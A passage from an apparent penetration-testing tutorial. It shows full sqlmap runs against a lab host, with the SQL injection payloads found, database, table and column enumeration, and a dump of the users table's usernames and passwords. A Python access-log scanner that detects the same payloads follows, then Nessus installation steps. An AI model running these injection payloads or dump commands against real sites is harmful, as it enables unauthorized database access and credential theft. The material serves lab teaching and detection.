Payload: id=1' AND (SELECT 6458 FROM (SELECT(SLEEP(5)))bmnB) AND 'xpdu'='xpdu
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-4651' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767071,0x62496965714c765063665257444e644141445746534d51685a6d5a677970485155735271576f6356,0x7170707071)-- -
---
[05:19:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[05:19:55] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.10.131'
[*] ending @ 05:19:55 /2021-02-26/
  • Enumerate all databases.
┌──(root💀kali)-[~/桌面]
└─# sqlmap -u "192.168.10.131/Less-1?id=1" --dbs
___
__H__
___ ___[']_____ ___ ___  {1.5.2#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
|_|V...       |_|   http://sqlmap.org                                                                                                                                                                                            
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:23:06 /2021-02-26/
[05:23:06] [INFO] resuming back-end DBMS 'mysql' 
[05:23:06] [INFO] testing connection to the target URL
got a 301 redirect to 'http://192.168.10.131/Less-1/?id=1'. Do you want to follow? [Y/n] 
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4835=4835 AND 'SnrE'='SnrE
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a767071,(SELECT (ELT(3164=3164,1))),0x7170707071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'WDxU'='WDxU
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6458 FROM (SELECT(SLEEP(5)))bmnB) AND 'xpdu'='xpdu
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-4651' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767071,0x62496965714c765063665257444e644141445746534d51685a6d5a677970485155735271576f6356,0x7170707071)-- -
---
[05:23:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[05:23:08] [INFO] fetching database names
[05:23:08] [INFO] retrieved: 'information_schema'
[05:23:08] [INFO] retrieved: 'challenges'
[05:23:08] [INFO] retrieved: 'mysql'
[05:23:08] [INFO] retrieved: 'performance_schema'
[05:23:08] [INFO] retrieved: 'security'
available databases [5]:                                                                                                                                                                                                                  
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[05:23:08] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.10.131'
[*] ending @ 05:23:08 /2021-02-26/
  • Enumerate all tables in the security database.
┌──(root💀kali)-[~/桌面]
└─# sqlmap -u "192.168.10.131/Less-1?id=1" -D security --tables                                                                                                                                                                        2 ⨯
___
__H__
___ ___[']_____ ___ ___  {1.5.2#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
|_|V...       |_|   http://sqlmap.org                                                                                                                                                                                             
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:25:28 /2021-02-26/
[05:25:28] [INFO] resuming back-end DBMS 'mysql' 
[05:25:28] [INFO] testing connection to the target URL
got a 301 redirect to 'http://192.168.10.131/Less-1/?id=1'. Do you want to follow? [Y/n] 
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4835=4835 AND 'SnrE'='SnrE
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a767071,(SELECT (ELT(3164=3164,1))),0x7170707071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'WDxU'='WDxU
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6458 FROM (SELECT(SLEEP(5)))bmnB) AND 'xpdu'='xpdu
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-4651' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767071,0x62496965714c765063665257444e644141445746534d51685a6d5a677970485155735271576f6356,0x7170707071)-- -
---
[05:25:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.5
[05:25:29] [INFO] fetching tables for database: 'security'
[05:25:29] [INFO] retrieved: 'emails'
[05:25:29] [INFO] retrieved: 'referers'
[05:25:29] [INFO] retrieved: 'uagents'
[05:25:29] [INFO] retrieved: 'users'
Database: security                                                                                                                                                                                                                        
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+
[05:25:29] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.10.131'
[*] ending @ 05:25:29 /2021-02-26/
  • Enumerate all columns of the users table.
┌──(root💀kali)-[~/桌面]
└─# sqlmap -u "192.168.10.131/Less-1?id=1" -D security -T users --columns
___
__H__
___ ___[']_____ ___ ___  {1.5.2#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
|_|V...       |_|   http://sqlmap.org                                                                                                                                                                                                
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:26:34 /2021-02-26/
[05:26:34] [INFO] resuming back-end DBMS 'mysql' 
[05:26:34] [INFO] testing connection to the target URL
got a 301 redirect to 'http://192.168.10.131/Less-1/?id=1'. Do you want to follow? [Y/n] 
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4835=4835 AND 'SnrE'='SnrE
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a767071,(SELECT (ELT(3164=3164,1))),0x7170707071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'WDxU'='WDxU
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6458 FROM (SELECT(SLEEP(5)))bmnB) AND 'xpdu'='xpdu
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-4651' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767071,0x62496965714c765063665257444e644141445746534d51685a6d5a677970485155735271576f6356,0x7170707071)-- -
---
[05:26:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[05:26:36] [INFO] fetching columns for table 'users' in database 'security'
[05:26:36] [INFO] retrieved: 'id','int(3)'
[05:26:36] [INFO] retrieved: 'username','varchar(20)'
[05:26:36] [INFO] retrieved: 'password','varchar(20)'
Database: security                                                                                                                                                                                                                        
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
[05:26:36] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.10.131'
[*] ending @ 05:26:36 /2021-02-26/
  • Dump the data in the username and password columns of the users table.
┌──(root💀kali)-[~/桌面]
└─# sqlmap -u "192.168.10.131/Less-1?id=1" -D security -T users -C "username,password" --dump
___
__H__
___ ___[']_____ ___ ___  {1.5.2#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
|_|V...       |_|   http://sqlmap.org                                                                                                                                                                                               
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:28:07 /2021-02-26/
[05:28:07] [INFO] resuming back-end DBMS 'mysql' 
[05:28:07] [INFO] testing connection to the target URL
got a 301 redirect to 'http://192.168.10.131/Less-1/?id=1'. Do you want to follow? [Y/n] 
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4835=4835 AND 'SnrE'='SnrE
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a767071,(SELECT (ELT(3164=3164,1))),0x7170707071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'WDxU'='WDxU
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6458 FROM (SELECT(SLEEP(5)))bmnB) AND 'xpdu'='xpdu
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-4651' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767071,0x62496965714c765063665257444e644141445746534d51685a6d5a677970485155735271576f6356,0x7170707071)-- -
---
[05:28:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[05:28:08] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'security'
[05:28:08] [INFO] retrieved: 'Dumb','Dumb'
[05:28:08] [INFO] retrieved: 'I-kill-you','Angelina'
[05:28:08] [INFO] retrieved: 'p@ssword','Dummy'
[05:28:08] [INFO] retrieved: 'crappy','secure'
[05:28:08] [INFO] retrieved: 'stupidity','stupid'
[05:28:08] [INFO] retrieved: 'genious','superman'
[05:28:08] [INFO] retrieved: 'mob!le','batman'
[05:28:08] [INFO] retrieved: 'admin','admin'
[05:28:08] [INFO] retrieved: 'admin1','admin1'
[05:28:08] [INFO] retrieved: 'admin2','admin2'
[05:28:08] [INFO] retrieved: 'admin3','admin3'
[05:28:09] [INFO] retrieved: 'dumbo','dhakkan'
[05:28:09] [INFO] retrieved: 'admin4','admin4'
Database: security                                                                                                                                                                                                                        
Table: users
[13 entries]
+----------+------------+
| username | password   |
+----------+------------+
| Dumb     | Dumb       |
| Angelina | I-kill-you |
| Dummy    | p@ssword   |
| secure   | crappy     |
| stupid   | stupidity  |
| superman | genious    |
| batman   | mob!le     |
| admin    | admin      |
| admin1   | admin1     |
| admin2   | admin2     |
| admin3   | admin3     |
| dhakkan  | dumbo      |
| admin4   | admin4     |
+----------+------------+
[05:28:09] [INFO] table 'security.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.10.131/dump/security/users.csv'
[05:28:09] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.10.131'
[*] ending @ 05:28:09 /2021-02-26/
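The runs above show four injection techniques that sqlmap confirmed against the id parameter (boolean-based blind, error-based, time-based blind and UNION). As an added example, not part of the original notes or of sqlmap itself, the following Python script classifies web-server access-log requests by those same techniques; the log lines, the source IP and the signature regexes are constructed assumptions that reuse the payload shapes reported above.

```python
import re
from urllib.parse import quote, unquote_plus

# Hypothetical payloads reusing the shapes sqlmap reported above for /Less-1?id=1
# (first entry is a benign request for contrast); all constructed, not real traffic.
PAYLOADS = [
    "1",
    "1' AND 4835=4835 AND 'SnrE'='SnrE",
    "1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a767071,(SELECT (ELT(3164=3164,1))),"
    "0x7170707071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'WDxU'='WDxU",
    "1' AND (SELECT 6458 FROM (SELECT(SLEEP(5)))bmnB) AND 'xpdu'='xpdu",
    "-4651' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767071,0x62,0x7170707071)-- -",
]

# Constructed access-log lines (Apache common log format) carrying those payloads.
SAMPLE_LOG = "\n".join(
    f'192.168.10.1 - - [26/Feb/2021:05:23:08 +0000] "GET /Less-1/?id={quote(p, safe="")} HTTP/1.1" 200 721'
    for p in PAYLOADS
)

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# One signature per technique sqlmap listed, keyed to the tell-tale fragment of that
# technique's probe rather than to a generic keyword (comments show the matching fragment).
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),    # AND 4835=4835
    ("error-based",         re.compile(r"\bELT\s*\(\s*\d+\s*=\s*\d+", re.I)),  # ELT(3164=3164,1)
    ("time-based blind",    re.compile(r"\bSLEEP\s*\(\s*\d+", re.I)),          # SLEEP(5)
    ("UNION query",         re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)), # UNION ALL SELECT
]

def classify(target):
    """Return the technique names whose signature matches the URL-decoded request target."""
    decoded = unquote_plus(target)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]

def scan_log(text):
    """Return one record per logged request that matches at least one injection signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not common log format; skip rather than guess
        techniques = classify(m["target"])
        if techniques:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                         "techniques": techniques, "target": unquote_plus(m["target"])})
    return hits

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h["ip"], h["ts"], "|", ", ".join(h["techniques"]), "|", h["target"][:60])
```

Decoding the target before matching matters: sqlmap sends these payloads percent-encoded, so signatures applied to the raw log line would miss every one of them.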

Setting Up and Using Nessus

Setup

  • Download Nessus

Download URL: https://www.tenable.com/downloads/nessus

  • Install Nessus
┌──(root💀kali)-[~/桌面]
└─# dpkg -i Nessus-8.13.1-debian6_amd64.deb                                 
正在选中未选择的软件包 nessus。
(正在读取数据库 ... 系统当前共安装有 307423 个文件和目录。)
准备解压 Nessus-8.13.1-debian6_amd64.deb  ...
正在解压 nessus (8.13.1) ...
正在设置 nessus (8.13.1) ...
Unpacking Nessus Scanner Core Components...
- You can start Nessus Scanner by typing /bin/systemctl start nessusd.service
- Then go to https://kali:8834/ to configure your scanner
  • Start Nessus
┌──(root💀kali)-[~/桌面]
└─# systemctl start nessusd.service    
  • Open localhost:8834 in the Firefox browser
┌──(root💀kali)-[~/桌面]
└─# firefox https://localhost:8834
  • Initialize Nessus

Click the button highlighted in the red box.

  • Obtain an activation code

http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code

  • Enter the activation code

  • Create a user

  • Start the installation

Usage

  • Scan a website: click the button in the red box to create a scan.

  • Click the advanced settings in the red box.

  • Set the basic information. After filling in the text boxes, click the Save button.

  • Click the run button; the scan will start.